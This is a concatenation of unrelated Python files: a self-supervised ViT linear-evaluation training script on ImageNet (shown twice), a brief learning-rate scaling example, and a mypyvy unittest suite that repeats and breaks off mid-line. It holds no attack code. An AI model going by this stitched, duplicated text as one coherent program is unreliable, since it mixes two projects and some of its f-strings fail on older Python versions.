torch.utils.data.DataLoader( dataset_val, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.") # ============ building network ... ============ # if the network is a Vision Transformer (i.e. 
vit_tiny, vit_small, vit_base) if args.arch in vits.__dict__.keys(): model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0) embed_dim = model.embed_dim * (args.n_last_blocks + int(args.avgpool_patchtokens)) # if the network is a XCiT elif "xcit" in args.arch: model = torch.hub.load('facebookresearch/xcit', args.arch, num_classes=0) embed_dim = model.embed_dim # otherwise, we check if the architecture is in torchvision models elif args.arch in torchvision_models.__dict__.keys(): model = torchvision_models.__dict__[args.arch]() embed_dim = model.fc.weight.shape[1] model.fc = nn.Identity() else: print(f"Unknown architecture: {args.arch}") sys.exit(1) model.cuda() model.eval() # load weights to evaluate utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size) print(f"Model {args.arch} built.") linear_classifier = LinearClassifier(embed_dim, num_labels=args.num_labels) linear_classifier = linear_classifier.cuda() linear_classifier = nn.parallel.DistributedDataParallel(linear_classifier, device_ids=[args.gpu]) # set optimizer optimizer = torch.optim.SGD( linear_classifier.parameters(), args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule momentum=0.9, weight_decay=0, # we do not apply weight decay ) scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epochs, eta_min=0) # Optionally resume from a checkpoint to_restore = {"epoch": 0, "best_acc": 0.} utils.restart_from_checkpoint( os.path.join(args.output_dir, "checkpoint.pth.tar"), run_variables=to_restore, state_dict=linear_classifier, optimizer=optimizer, scheduler=scheduler, ) start_epoch = to_restore["epoch"] best_acc = to_restore["best_acc"] for epoch in range(start_epoch, args.epochs): train_loader.sampler.set_epoch(epoch) train_stats = train(model, linear_classifier, optimizer, train_loader, epoch, args.n_last_blocks, args.avgpool_patchtokens) scheduler.step() log_stats = {**{f'train_{k}': v for k, v in train_stats.items()}, 'epoch': epoch} if epoch % args.val_freq == 0 or epoch == args.epochs - 1: test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens) print(f"Accuracy at epoch {epoch} of the network on the {len(dataset_val)} test images: {test_stats["acc1"]:.1f}%") best_acc = max(best_acc, test_stats["acc1"]) print(f'Max accuracy so far: {best_acc:.2f}%') log_stats = {**{k: v for k, v in log_stats.items()}, **{f'test_{k}': v for k, v in test_stats.items()}} if utils.is_main_process(): with (Path(args.output_dir) / "log.txt").open("a") as f: f.write(json.dumps(log_stats) + "\n") save_dict = { "epoch": epoch + 1, "state_dict": linear_classifier.state_dict(), "optimizer": optimizer.state_dict(), "scheduler": scheduler.state_dict(), "best_acc": best_acc, } torch.save(save_dict, os.path.join(args.output_dir, "checkpoint.pth.tar")) print("Training of the supervised linear classifier on frozen features completed.\n" "Top-1 test accuracy: {acc:.1f}".format(acc=best_acc)) def train(model, linear_classifier, optimizer, loader, epoch, n, avgpool): linear_classifier.train() metric_logger = utils.MetricLogger(delimiter=" ") metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}')) header = 'Epoch: [{}]'.format(epoch) for (inp, target) in metric_logger.log_every(loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: 
intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) # compute cross entropy loss loss = nn.CrossEntropyLoss()(output, target) # compute the gradients optimizer.zero_grad() loss.backward() # step optimizer.step() # log torch.cuda.synchronize() metric_logger.update(loss=loss.item()) metric_logger.update(lr=optimizer.param_groups[0]["lr"]) # gather the stats from all processes metric_logger.synchronize_between_processes() print("Averaged stats:", metric_logger) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} @torch.no_grad() def validate_network(val_loader, model, linear_classifier, n, avgpool): linear_classifier.eval() metric_logger = utils.MetricLogger(delimiter=" ") header = 'Test:' for inp, target in metric_logger.log_every(val_loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) loss = nn.CrossEntropyLoss()(output, target) if linear_classifier.module.num_labels >= 5: acc1, acc5 = utils.accuracy(output, target, topk=(1, 5)) else: acc1, = utils.accuracy(output, target, topk=(1,)) batch_size = inp.shape[0] metric_logger.update(loss=loss.item()) metric_logger.meters['acc1'].update(acc1.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: metric_logger.meters['acc5'].update(acc5.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss)) else: print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, losses=metric_logger.loss)) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} class LinearClassifier(nn.Module): """Linear layer to train on top of frozen features""" def __init__(self, dim, num_labels=1000): super(LinearClassifier, self).__init__() self.num_labels = num_labels self.linear = nn.Linear(dim, num_labels) self.linear.weight.data.normal_(mean=0.0, std=0.01) self.linear.bias.data.zero_() def forward(self, x): # flatten x = x.view(x.size(0), -1) # linear layer return self.linear(x) if __name__ == '__main__': parser = argparse.ArgumentParser('Evaluation with linear classification on ImageNet') parser.add_argument('--n_last_blocks', default=4, type=int, help="""Concatenate [CLS] tokens for the `n` last blocks. We use `n=4` when evaluating ViT-Small and `n=1` with ViT-Base.""") parser.add_argument('--avgpool_patchtokens', default=False, type=utils.bool_flag, help="""Whether or not to concatenate the global average pooled features to the [CLS] token. 
We typically set this to False for ViT-Small and to True with ViT-Base.""") parser.add_argument('--arch', default='vit_small', type=str, help='Architecture') parser.add_argument('--patch_size', default=16, type=int, help='Patch resolution of the model.') parser.add_argument('--pretrained_weights', default='', type=str, help="Path to pretrained weights to evaluate.") parser.add_argument("--checkpoint_key", default="teacher", type=str, help='Key to use in the checkpoint (example: "teacher")') parser.add_argument('--epochs', default=100, type=int, help='Number of epochs of training.') parser.add_argument("--lr", default=0.001, type=float, help="""Learning rate at the beginning of training (highest LR used during training). The learning rate is linearly scaled with the batch size, and specified here for a reference batch size of 256. We recommend tweaking the LR depending on the checkpoint evaluated.""") parser.add_argument('--batch_size_per_gpu', default=128, type=int, help='Per-GPU batch-size') parser.add_argument("--dist_url", default="env://", type=str, help="""url used to set up distributed training; see https://pytorch.org/docs/stable/distributed.html""") parser.add_argument("--local_rank", default=0, type=int, help="Please ignore and do not set this argument.") parser.add_argument('--data_path', default='/path/to/imagenet/', type=str) parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.') parser.add_argument('--val_freq', default=1, type=int, help="Epoch frequency for validation.") parser.add_argument('--output_dir', default=".", help='Path to save logs and checkpoints') parser.add_argument('--num_labels', default=1000, type=int, help='Number of labels for linear classifier') args = parser.parse_args() eval_linear(args)
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys import argparse import json from pathlib import Path import torch from torch import nn import torch.distributed as dist import torch.backends.cudnn as cudnn from torchvision import datasets from torchvision import transforms as pth_transforms from torchvision import models as torchvision_models import utils import vision_transformer as vits def eval_linear(args): utils.init_distributed_mode(args) print("git:\n {}\n".format(utils.get_sha())) print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items()))) cudnn.benchmark = True # ============ preparing data ... ============ train_transform = pth_transforms.Compose([ pth_transforms.RandomResizedCrop(224), pth_transforms.RandomHorizontalFlip(), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) val_transform = pth_transforms.Compose([ pth_transforms.Resize(256, interpolation=3), pth_transforms.CenterCrop(224), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) dataset_train = datasets.ImageFolder(os.path.join(args.data_path, "train"), transform=train_transform) dataset_val = datasets.ImageFolder(os.path.join(args.data_path, "val"), transform=val_transform) sampler = torch.utils.data.distributed.DistributedSampler(dataset_train) train_loader = torch.utils.data.DataLoader( dataset_train, sampler=sampler, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) val_loader = torch.utils.data.DataLoader( dataset_val, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.") # ============ building network ... ============ # if the network is a Vision Transformer (i.e. 
vit_tiny, vit_small, vit_base) if args.arch in vits.__dict__.keys(): model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0) embed_dim = model.embed_dim * (args.n_last_blocks + int(args.avgpool_patchtokens)) # if the network is a XCiT elif "xcit" in args.arch: model = torch.hub.load('facebookresearch/xcit', args.arch, num_classes=0) embed_dim = model.embed_dim # otherwise, we check if the architecture is in torchvision models elif args.arch in torchvision_models.__dict__.keys(): model = torchvision_models.__dict__[args.arch]() embed_dim = model.fc.weight.shape[1] model.fc = nn.Identity() else: print(f"Unknown architecture: {args.arch}") sys.exit(1) model.cuda() model.eval() # load weights to evaluate utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size) print(f"Model {args.arch} built.") linear_classifier = LinearClassifier(embed_dim, num_labels=args.num_labels) linear_classifier = linear_classifier.cuda() linear_classifier = nn.parallel.DistributedDataParallel(linear_classifier, device_ids=[args.gpu]) # set optimizer optimizer = torch.optim.SGD( linear_classifier.parameters(), args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule momentum=0.9, weight_decay=0, # we do not apply weight decay ) scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epochs, eta_min=0) # Optionally resume from a checkpoint to_restore = {"epoch": 0, "best_acc": 0.} utils.restart_from_checkpoint( os.path.join(args.output_dir, "checkpoint.pth.tar"), run_variables=to_restore, state_dict=linear_classifier, optimizer=optimizer, scheduler=scheduler, ) start_epoch = to_restore["epoch"] best_acc = to_restore["best_acc"] for epoch in range(start_epoch, args.epochs): train_loader.sampler.set_epoch(epoch) train_stats = train(model, linear_classifier, optimizer, train_loader, epoch, args.n_last_blocks, args.avgpool_patchtokens) scheduler.step() log_stats = {**{f'train_{k}': v for k, v in train_stats.items()}, 'epoch': epoch} if epoch % args.val_freq == 0 or epoch == args.epochs - 1: test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens) print(f"Accuracy at epoch {epoch} of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%") best_acc = max(best_acc, test_stats["acc1"]) print(f'Max accuracy so far: {best_acc:.2f}%') log_stats = {**{k: v for k, v in log_stats.items()}, **{f'test_{k}': v for k, v in test_stats.items()}} if utils.is_main_process(): with (Path(args.output_dir) / "log.txt").open("a") as f: f.write(json.dumps(log_stats) + "\n") save_dict = { "epoch": epoch + 1, "state_dict": linear_classifier.state_dict(), "optimizer": optimizer.state_dict(), "scheduler": scheduler.state_dict(), "best_acc": best_acc, } torch.save(save_dict, os.path.join(args.output_dir, "checkpoint.pth.tar")) print("Training of the supervised linear classifier on frozen features completed.\n" "Top-1 test accuracy: {acc:.1f}".format(acc=best_acc)) def train(model, linear_classifier, optimizer, loader, epoch, n, avgpool): linear_classifier.train() metric_logger = utils.MetricLogger(delimiter=" ") metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}')) header = 'Epoch: [{}]'.format(epoch) for (inp, target) in metric_logger.log_every(loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: 
intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) # compute cross entropy loss loss = nn.CrossEntropyLoss()(output, target) # compute the gradients optimizer.zero_grad() loss.backward() # step optimizer.step() # log torch.cuda.synchronize() metric_logger.update(loss=loss.item()) metric_logger.update(lr=optimizer.param_groups[0]["lr"]) # gather the stats from all processes metric_logger.synchronize_between_processes() print("Averaged stats:", metric_logger) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} @torch.no_grad() def validate_network(val_loader, model, linear_classifier, n, avgpool): linear_classifier.eval() metric_logger = utils.MetricLogger(delimiter=" ") header = 'Test:' for inp, target in metric_logger.log_every(val_loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) loss = nn.CrossEntropyLoss()(output, target) if linear_classifier.module.num_labels >= 5: acc1, acc5 = utils.accuracy(output, target, topk=(1, 5)) else: acc1, = utils.accuracy(output, target, topk=(1,)) batch_size = inp.shape[0] metric_logger.update(loss=loss.item()) metric_logger.meters['acc1'].update(acc1.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: metric_logger.meters['acc5'].update(acc5.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss)) else: print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, losses=metric_logger.loss)) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} class LinearClassifier(nn.Module): """Linear layer to train on top of frozen features""" def __init__(self, dim, num_labels=1000): super(LinearClassifier, self).__init__() self.num_labels = num_labels self.linear = nn.Linear(dim, num_labels) self.linear.weight.data.normal_(mean=0.0, std=0.01) self.linear.bias.data.zero_() def forward(self, x): # flatten x = x.view(x.size(0), -1) # linear layer return self.linear(x) if __name__ == '__main__': parser = argparse.ArgumentParser('Evaluation with linear classification on ImageNet') parser.add_argument('--n_last_blocks', default=4, type=int, help="""Concatenate [CLS] tokens for the `n` last blocks. We use `n=4` when evaluating ViT-Small and `n=1` with ViT-Base.""") parser.add_argument('--avgpool_patchtokens', default=False, type=utils.bool_flag, help="""Whether or not to concatenate the global average pooled features to the [CLS] token. 
We typically set this to False for ViT-Small and to True with ViT-Base.""") parser.add_argument('--arch', default='vit_small', type=str, help='Architecture') parser.add_argument('--patch_size', default=16, type=int, help='Patch resolution of the model.') parser.add_argument('--pretrained_weights', default='', type=str, help="Path to pretrained weights to evaluate.") parser.add_argument("--checkpoint_key", default="teacher", type=str, help='Key to use in the checkpoint (example: "teacher")') parser.add_argument('--epochs', default=100, type=int, help='Number of epochs of training.') parser.add_argument("--lr", default=0.001, type=float, help="""Learning rate at the beginning of training (highest LR used during training). The learning rate is linearly scaled with the batch size, and specified here for a reference batch size of 256. We recommend tweaking the LR depending on the checkpoint evaluated.""") parser.add_argument('--batch_size_per_gpu', default=128, type=int, help='Per-GPU batch-size') parser.add_argument("--dist_url", default="env://", type=str, help="""url used to set up distributed training; see https://pytorch.org/docs/stable/distributed.html""") parser.add_argument("--local_rank", default=0, type=int, help="Please ignore and do not set this argument.") parser.add_argument('--data_path', default='/path/to/imagenet/', type=str) parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.') parser.add_argument('--val_freq', default=1, type=int, help="Epoch frequency for validation.") parser.add_argument('--output_dir', default=".", help='Path to save logs and checkpoints') parser.add_argument('--num_labels', default=1000, type=int, help='Number of labels for linear classifier') args = parser.parse_args() eval_linear(args)
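The SGD optimizer above applies the linear scaling rule: the base learning rate, defined for a reference batch of 256, is multiplied by the total batch size across GPUs divided by 256. A worked example with the script's defaults and a hypothetical world size:

base_lr = 0.001            # --lr default, specified for a 256-sample batch
batch_size_per_gpu = 128   # --batch_size_per_gpu default
world_size = 4             # hypothetical number of GPUs

# 128 * 4 = 512 samples per step, i.e. 2x the reference batch, so the LR doubles.
effective_lr = base_lr * (batch_size_per_gpu * world_size) / 256.
print(effective_lr)  # 0.002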
import unittest import utils import parser import syntax import mypyvy import os from pathlib import Path import shlex import subprocess from typing import List PROJECT_ROOT = Path(__file__).resolve().parent.parent class SyntaxTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_as_clauses_basic(self) -> None: ios = [ ('true', ['true | false']), ('foo', ['foo | false']), ('forall N1,N2. grant_msg(N1) & grant_msg(N2) -> N1 = N2', ['forall N1, N2. !grant_msg(N1) | !grant_msg(N2) | N1 = N2']), ('forall N1,N2. !(holds_lock(N1) & grant_msg(N2))', ['forall N1, N2. !holds_lock(N1) | !grant_msg(N2)']), ('forall N. !(unlock_msg(N) & server_holds_lock)', ['forall N. !unlock_msg(N) | !server_holds_lock']), ('!(exists N. holds_lock(N) & server_holds_lock)', ['forall N. !holds_lock(N) | !server_holds_lock']), ('!!(forall X. !(exists Y. (r(X) & s(Y)) & (q(X) & p(Y))))', ['forall X, Y. !r(X) | !s(Y) | !q(X) | !p(Y)']), ('forall X. r(X) & s(X)', ['forall X. r(X) | false', 'forall X. s(X) | false']), ('forall X. (r(X) | s(X)) & (q(X) | p(X))', ['forall X. r(X) | s(X)', 'forall X. q(X) | p(X)']), ] for expr, expected in ios: with self.subTest(expr=expr): clauses = syntax.as_clauses(parser.parse_expr(expr)) # print(clause) self.assertEqual(clauses, [parser.parse_expr(expected_clause) for expected_clause in expected]) def test_as_clauses_fail(self) -> None: egs = [ 'exists X. X = X', ] for expr in egs: with self.subTest(expr=expr): with self.assertRaises(Exception): print(syntax.as_clauses(parser.parse_expr(expr))) def test_as_clauses_lockserv(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog = mypyvy.parse_program(f.read()) prog.resolve() for inv in prog.invs(): expr = inv.expr with self.subTest(expr=expr): syntax.as_clauses(expr) def test_consistent_hashing(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog1 = mypyvy.parse_program(f.read()) with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog2 = mypyvy.parse_program(f.read()) prog1.resolve() prog2.resolve() for d1, d2 in zip(prog1.decls_containing_exprs(), prog2.decls_containing_exprs()): e1 = d1.expr e2 = d2.expr with self.subTest(msg='expr hash/eq', e1=e1, e2=e2): self.assertEqual(e1, e2) self.assertEqual(hash(e1), hash(e2)) def test_relativize_quantifiers(self) -> None: minipaxos = ''' sort node sort quorum immutable relation member(node, quorum) mutable relation active_node(node) mutable relation active_quorum(quorum) ''' prog = mypyvy.parse_program(minipaxos) prog.resolve() node = prog.scope.get_sort('node') assert node is not None quorum = prog.scope.get_sort('quorum') assert quorum is not None active_node = prog.scope.get('active_node') assert isinstance(active_node, syntax.RelationDecl) active_quorum = prog.scope.get('active_quorum') assert isinstance(active_quorum, syntax.RelationDecl) guards = {node: active_node, quorum: active_quorum} e = parser.parse_expr('forall Q1, Q2. exists N. member(N, Q1) & member(N, Q2)') e.resolve(prog.scope, None) expected = parser.parse_expr('forall Q1, Q2. active_quorum(Q1) & active_quorum(Q2) -> exists N. 
active_node(N) & (member(N, Q1) & member(N, Q2))') expected.resolve(prog.scope, None) self.assertEqual(syntax.relativize_quantifiers(guards, e), expected) def build_python_cmd() -> List[str]: python = os.getenv('PYTHON') or 'python3.7' return [python, str((PROJECT_ROOT / 'src' / 'mypyvy.py').resolve())] class RegressionTests(unittest.TestCase): def test_regressions(self) -> None: for p in sorted(Path(PROJECT_ROOT / 'examples' / 'regression').glob('*.pyv')): with self.subTest(testFile=str(p)): with open(p) as f: line = f.readline() magic_prefix = '# MYPYVY: ' assert line.startswith(magic_prefix) line = line[len(magic_prefix):] python = os.getenv('PYTHON') or 'python3.7' out_path = p.with_suffix('.output') expect_path = p.with_suffix('.expect') python_cmd = build_python_cmd() + shlex.split(line) + [str(p)] with open(out_path, 'w') as f_out: subprocess.run(python_cmd, stdout=f_out) diff_cmd = ['diff', '-uw', str(expect_path), str(out_path)] proc = subprocess.run(diff_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.assertEqual(proc.returncode, 0, msg=f'{p} generated output {out_path} which differs from expected output {expect_path}.\n{' '.join(python_cmd)}\n{' '.join(diff_cmd)}') class MonotoneFunctionTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_monotone_function(self) -> None: from pd import MonotoneFunction elems: List[str] = [] mf = MonotoneFunction([(elems,'+')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], False ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], False ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = False self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = True self.assertEqual( mf[frozenset([0,1]),], True ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], True ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) mf = MonotoneFunction([(None, '+')]) 
with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[frozenset(),] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[0,]) with self.assertRaises(Exception): mf[-1,] self.assertIsNone(mf.seed([(0,0)])) self.assertIsNone(mf.seed([(None,0)])) self.assertIsNotNone(mf.seed([(None,None)])) self.assertIsNotNone(mf.seed([(100,None)])) v = mf.seed([(100,200)]) self.assertIsNotNone(v) assert v is not None k = v[0] self.assertIsInstance(k, int) self.assertLessEqual(100, k) self.assertLess(k, 200) self.assertIsNone(mf.seed([(5,5)])) self.assertEqual(mf.seed([(5,6)]), (5,)) mf[5,] = False self.assertIsNone(mf.seed([(None,6)])) mf[50,] = True self.assertIsNone(mf.seed([(50,None)])) self.assertEqual(mf.seed([(None,7)]), (6,)) self.assertEqual(mf.seed([(49,None)]), (49,)) with self.assertRaises(Exception): mf[None,] = True with self.assertRaises(Exception): mf[None,] = False elems = [] mf = MonotoneFunction([(elems,'-')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = True with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], True ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = True with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], True ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = True self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = False self.assertEqual( mf[frozenset([0,1]),], False ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], False ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) # TODO: test multiple domains together, more tests with infinity
import unittest import utils import parser import syntax import mypyvy import os from pathlib import Path import shlex import subprocess from typing import List PROJECT_ROOT = Path(__file__).resolve().parent.parent class SyntaxTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_as_clauses_basic(self) -> None: ios = [ ('true', ['true | false']), ('foo', ['foo | false']), ('forall N1,N2. grant_msg(N1) & grant_msg(N2) -> N1 = N2', ['forall N1, N2. !grant_msg(N1) | !grant_msg(N2) | N1 = N2']), ('forall N1,N2. !(holds_lock(N1) & grant_msg(N2))', ['forall N1, N2. !holds_lock(N1) | !grant_msg(N2)']), ('forall N. !(unlock_msg(N) & server_holds_lock)', ['forall N. !unlock_msg(N) | !server_holds_lock']), ('!(exists N. holds_lock(N) & server_holds_lock)', ['forall N. !holds_lock(N) | !server_holds_lock']), ('!!(forall X. !(exists Y. (r(X) & s(Y)) & (q(X) & p(Y))))', ['forall X, Y. !r(X) | !s(Y) | !q(X) | !p(Y)']), ('forall X. r(X) & s(X)', ['forall X. r(X) | false', 'forall X. s(X) | false']), ('forall X. (r(X) | s(X)) & (q(X) | p(X))', ['forall X. r(X) | s(X)', 'forall X. q(X) | p(X)']), ] for expr, expected in ios: with self.subTest(expr=expr): clauses = syntax.as_clauses(parser.parse_expr(expr)) # print(clause) self.assertEqual(clauses, [parser.parse_expr(expected_clause) for expected_clause in expected]) def test_as_clauses_fail(self) -> None: egs = [ 'exists X. X = X', ] for expr in egs: with self.subTest(expr=expr): with self.assertRaises(Exception): print(syntax.as_clauses(parser.parse_expr(expr))) def test_as_clauses_lockserv(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog = mypyvy.parse_program(f.read()) prog.resolve() for inv in prog.invs(): expr = inv.expr with self.subTest(expr=expr): syntax.as_clauses(expr) def test_consistent_hashing(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog1 = mypyvy.parse_program(f.read()) with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog2 = mypyvy.parse_program(f.read()) prog1.resolve() prog2.resolve() for d1, d2 in zip(prog1.decls_containing_exprs(), prog2.decls_containing_exprs()): e1 = d1.expr e2 = d2.expr with self.subTest(msg='expr hash/eq', e1=e1, e2=e2): self.assertEqual(e1, e2) self.assertEqual(hash(e1), hash(e2)) def test_relativize_quantifiers(self) -> None: minipaxos = ''' sort node sort quorum immutable relation member(node, quorum) mutable relation active_node(node) mutable relation active_quorum(quorum) ''' prog = mypyvy.parse_program(minipaxos) prog.resolve() node = prog.scope.get_sort('node') assert node is not None quorum = prog.scope.get_sort('quorum') assert quorum is not None active_node = prog.scope.get('active_node') assert isinstance(active_node, syntax.RelationDecl) active_quorum = prog.scope.get('active_quorum') assert isinstance(active_quorum, syntax.RelationDecl) guards = {node: active_node, 